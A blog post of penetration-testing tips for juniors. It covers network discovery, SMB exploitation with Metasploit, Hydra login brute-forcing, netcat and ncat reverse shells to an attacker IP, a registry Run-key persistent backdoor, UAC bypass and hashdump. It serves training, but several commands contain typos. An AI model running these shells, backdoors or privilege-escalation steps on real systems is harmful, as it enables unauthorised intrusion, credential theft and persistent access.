Back to Basics -> Junior pentester tips and methodology
Recently myself and a very experienced government cyber analyst were discussing tradecraft. He made a valid point in stating that “experts and pros focus on the basics and do the basics well” I couldnt agree more, it got me thinking that perhaps I should share some of my top basic tips to master when starting within the penetration testing world as a junior.
Setting Up
cat /etc/resolv.conf
echo “namserver X.X.X.X” > /etc/resolv.conf
service network-manger status|start|stop
rounte -n
route add default gw X.X.X.X eth0
Oneliners for internal host discovery.
- arp-scan $ipaddress | grep 192.168.X | cut -f1 | grep -v ipv4 | grep -v MAC > hosts.txt
- >cat *.nmap | grep “open” | grep -v “filtered” | cut -d “/” -f1 | sort -u | xargs
- fping -a -g [ip range]
#The above command simply ->
- arp-scan $ipaddress | grep 192.168.X | cut -f1 = call arp-scan on the selected ip range then from the results only show me the results from the first 3 octets of the IP address
I particular like this oneline as it gives quick results to what port numbers “services” are open on the network range, this can be really useful in certification exams like TIGER SCHEME QSTM and CREST CRT, as you will get asked what ports number are open on X ip range.
Gather a Hostname
nslookup $Ip | nmap $ip will also give hostname
msf_db
>db_nmap -vv -iL 10hosts.txt 192hosts.txt 172hosts.txt
>db_nmap -vv -sU -iL 10hosts.txt
>db_status
>msfdb .init
Nessus
/sbin/service nessusd start/stop
Localhost:8334
SMB — Server Message Block
SMB has for a long time been in the spot light of nortorious vulnerabilities.To really master internal pentest you need to spend a while reading up on SMB and become comftable explointing this service. Here is an overview:
I think SMB exploitation can get confusing as theres so many different tools therefore lets look at a selection and keep it simple.
>nmap[-][-](dash) script smb -vuln* -p445 192.168.83.0/24
>nmap -A -p 445 $Ip
>For LINUX to list shares “nmblookup -A $Ip”
>For Windows NETUSE \\$IP\[sharename]$ “ /u:”
>A manual method using built in python script “samrdump.py” to enum policy and users
You should be aware of the most common SMB vulns:
MS-17–010 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 which affects Vista /server 08 / Win 7 / 2008 R2 / Win 8.1 / 2012 (R2) / 8.1 / Win 10 / Server 2016
For older Windows machines like Windows 2000 / XP / Windows 2003 MS-08–06 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Understand PTH attack and SMB Relay attacks:
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
msfconsole:
use /smb_login
set smb pass [hash]
set smb user [user]
also
use exploit/windows/smb/psexec
also
windows/smb/ms17_010_psexec
Web Applications:
Virus total is great for finding subdomains. https://www.virustotal.com/gui/home/search
Along with DNS searching another good method is checking the sites certificates for subdomains crt.sh
-gobuster dir -u http://10.10.10.140 -w (wordlist) -t 50
-sublist3r -v -d [domin -b (brute force — /usr/share/sublist3r/subbrute/names.txt)
- amass
- apt install snapd ->service snapd start ->snap install amass
- snap run amass $ip / -d [domain]
Using Hydra for HTTP authentication bypass
Select the Network tab and then attempt to login (This will fail to log in). After the login fails click on the POST Method and then click on “Edit and Resent.”
look for the Hostname/IP, Login Page, Request Body, and the error message.
Command Build
With all the information that we have collected now let’s build the hydra command.
Change the <Login page> this value has to start with “/” backspace.
Change <Request body> with the format from the page. We do need to modify the username and password. Replace the failed username with ^USER^ and the failed password with ^PASS^. This change will allow hydra to substitute the values.
Change the <Error Message> with the failed login error message.
Change the <IP Address> with either an IP address or hostname.
Change the <User> with either username or username list.
Change the <Password> with either a password or password list.
Layout of command: hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
dirb tips
- > dirb [domain] -p (indicates using a proxy you can pass your results from dirb to burp (>dirb http://somesite.com -p 127.0.0.1:8080
- dirb -c uses a cookie to authenticate
- -z 1000 limit request to one per second incase of WAF
- -X (extensions) -x “.php/.bak”
Mysql:
mysql -u [username] -p [pass] -h [$Ip]
Netat and Ncat:
nc -lvp 8888 >recived.txt -e [cmd to execute]
nc -lvp 8888 -e /bin/bash (listner)
nc -v [$ip of victim ]8888
id / whoami
ncat
very simular to netcat (nc). Very useful if you can get ncat.exe on the windows victim machine.
attacker > ncat -l -p 5555 -v
victim>ncat -e cmd.exe [attacker ip] 5555
Creating a peristent backdoor
with ncat we need to add the commnad key to the system registry. Firstly in the attacker machine you will need to set your listnener
attacker:
>ncat -l -p 5544 -v
Victim:
now we add the ncat command structre to the registry
start>run>regedit>computer>HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENT VERSION \ RUN
Right click to add the string value to ncat binary select new >string value, then double click on the new file and enter the command you want to run e.g “C:\Windows\System32\ncat.exe 192.168.X.X :5544 -e”
You can now restart the victim machine, once the victim machine restarts the you will gain shell on the attacker listener.
Other methods of presistance
Meterpreter:
use exploit/windows/local/s4u_persistance
set session 2
set trigger logon
set payload windows/meterpreter/reverse_tcp
set lhost / lport
exploit
to test it set listener
exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport
run
now reboot victim and wait for shell :P
More on Meterpreter
“hashdump” can only be run at SYSTEM from the SAMlevel therefore attempt to priv esc by tpying “getsystem” if it fails it may be due to UAC you can check if UAC is enalbed
>post/windows/gather/win_privs
to bypass UAC
>background
>search uac
>use exploit/windows/local/bypassuac
>set session X
>exploit
After you have elevated privs by bypassing UAC heres some useful commands
- getpid (identify your current pid)
- ps -U SYSTEM (choose a pid in the list)
- migrate [PID]
- getpid
VNC (port 5800|5900)
you can use Firefox to connect via VNC
use auxilliary/scanner/vnc/vnc_login
Permissions
user | group | other (1 | 2 | 4 read | write | exe )
Ldap
ldapsearch -h [ip]-x -b “DC=[name],DC=local” | grep pwd
Kerberos
I think that its fair to say that if you can master all of the above you will be in fairly good place as a junior pentester rember keep it simple and keep enumeratting. Thanks for reading. CodedHound!